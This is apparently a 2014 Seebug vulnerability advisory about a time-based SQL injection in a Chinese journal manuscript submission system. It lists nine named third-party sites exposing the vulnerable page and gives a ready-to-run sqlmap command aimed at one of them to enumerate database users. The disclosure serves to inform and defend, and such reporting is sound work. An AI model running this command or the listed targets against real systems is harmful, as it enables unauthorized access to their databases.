SQL injection vulnerability in a journal manuscript submission system

2014-11-21T00:00:00
ID SSV:95737
Type seebug
Reporter Root
Modified 2014-11-21T00:00:00

Description

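Brief description:

As the title says.

Details:

The journal manuscript submission system by 南京杰诺瀚 (Nanjing Jienuohan) has a time-based (delayed) SQL injection vulnerability that allows arbitrary data to be read from the database... Official site: http://www.025journal.com/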


Cases:

http://www.cjge-manuscriptcentral.com/Tougao/UserEdit.aspx?IsAdd=1&type=1&IsTop=1
http://www.lcmzxzz.com/Tougao/UserEdit.aspx?IsAdd=1&type=1&IsTop=1
http://j.chinatransducers.com/Tougao/UserEdit.aspx?IsAdd=1&type=1&IsTop=1
http://gaojian.xhnj.com/Tougao/UserEdit.aspx?IsAdd=1&type=1&IsTop=1
http://xb.cuit.edu.cn/Tougao/UserEdit.aspx?IsAdd=1&type=1&IsTop=1
http://www.jsnyxb.com/Tougao/UserEdit.aspx?IsAdd=1&type=1&IsTop=1
http://www.lcsjwk.com/Tougao/UserEdit.aspx?IsAdd=1&type=1&IsTop=1
http://www.linpi.net/Tougao/UserEdit.aspx?IsAdd=1&type=1&IsTop=1
http://www.mfskin.net/Tougao/UserEdit.aspx?IsAdd=1&type=1&IsTop=1

Since this is a time-based injection

Proof of vulnerability:

Only one site is demonstrated: http://www.cjge-manuscriptcentral.com/Tougao/UserEdit.aspx?IsAdd=1&type=1&IsTop=1

sqlmap.py -u "http://www.cjge-manuscriptcentral.com/Tougao/UserEdit.aspx?IsAdd=1&type=1&IsTop=1%27,1,1,1,1,1,1,1,1,1,1,1,1*" --dbms mssql --level 1 --risk 3 --technique=T --users -v 3 --batch
